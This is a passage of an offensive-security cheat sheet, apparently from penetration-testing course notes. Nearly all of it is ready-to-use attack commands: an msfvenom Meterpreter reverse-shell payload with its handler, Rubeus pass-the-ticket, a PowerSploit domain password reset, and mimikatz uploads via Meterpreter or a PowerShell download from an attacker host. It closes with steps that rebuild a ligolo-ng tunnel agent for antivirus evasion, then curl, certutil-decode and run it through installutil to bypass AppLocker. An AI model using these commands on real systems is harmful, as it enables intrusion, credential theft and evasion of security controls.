msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=443 EXITFUNC=thread -f csharp > payload.c
```

Catch with

```bash
msfconsole -q -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost tun0; set lport 443; set exitfunc thread; exploit -j"
```

# rubeus

```powershell
Rubeus.exe asktgt /user:username /rc4:NTLM_hash /ptt
```

# powersploit

Reset a user’s password

```powershell
$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
Set-DomainUserPassword -Identity nina -AccountPassword $UserPassword
```

# mimikatz

You first need to upload the binaries to the target, via either a meterpreter session or PowerShell:

## meterpreter

```bash
upload /usr/share/windows-resources/mimikatz/x64/mimikatz.exe
upload /usr/share/windows-resources/mimikatz/x64/mimidrv.sys
```

## powershell

```powershell
# iwr needs a scheme in the URI
powershell -ep bypass -c iwr http://YOUR_IP/mimikatz.exe -o .\mimikatz.exe
powershell -ep bypass -c iwr http://YOUR_IP/mimidrv.sys -o .\mimidrv.sys
```

# ligolo-ng

> **Warning:** You can use the standard apt repos if you don't need to make any modifications, e.g. bypassing AppLocker or CLM.

```bash
sudo apt install ligolo-ng ligolo-ng-common-binaries -y
```

# Basic tunnel

1. Start `ligolo-proxy`

    ```bash
    sudo ligolo-proxy -selfcert
    ```
2. Connect the agent
3. Enter the session and list the network configuration

    ```bash
    # in the ligolo-ng prompt
    session
    ifconfig
    ```
4. Set the route
    1. 1 hop

        ```bash
        autoroute
        start
        ```
    2. 2 hops

## AV evasion

1. Clone the repository

    ```bash
    git clone https://github.com/nicocha30/ligolo-ng.git
    ```
2. Edit the `ignoreCertificate` and `serverAddr` variables in the following file: `/ligolo-ng/cmd/agent/main.go`
3. Compile `agent.exe` using the following command

    ```bash
    GOOS=windows go build -o agent.exe cmd/agent/main.go
    ```
4. Compile as `x64` and give it the name `ApplockerBypassExternalBinary.exe` - [Github Repo](https://github.com/blu3drag0nsec/osepvs/tree/main/tools/06.applocker/ApplockerBypassExternalBinary)
5. Encode the file created above with certutil

    ```cmd
    certutil.exe -encode .\ApplockerBypassExternalBinary.exe AppLockerBypassLigolo.txt
    ```
6. Rename `agent.exe` to `ligolo-agent.exe`
7. Serve the files (`ligolo-agent.exe` and `AppLockerBypassLigolo.txt`)
8. Upload the files to the target

    ```cmd
    cmd.exe /c curl http://YOUR_IP/ligolo-agent.exe -o C:\users\public\try-agent.exe && curl http://YOUR_IP/AppLockerBypassLigolo.txt -o C:\users\public\enc.txt && certutil -decode C:\users\public\enc.txt C:\users\public\ligolo.exe && del C:\users\public\enc.txt && C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe /logfile= /LogToConsole=true /U C:\users\public\ligolo.exe
    ```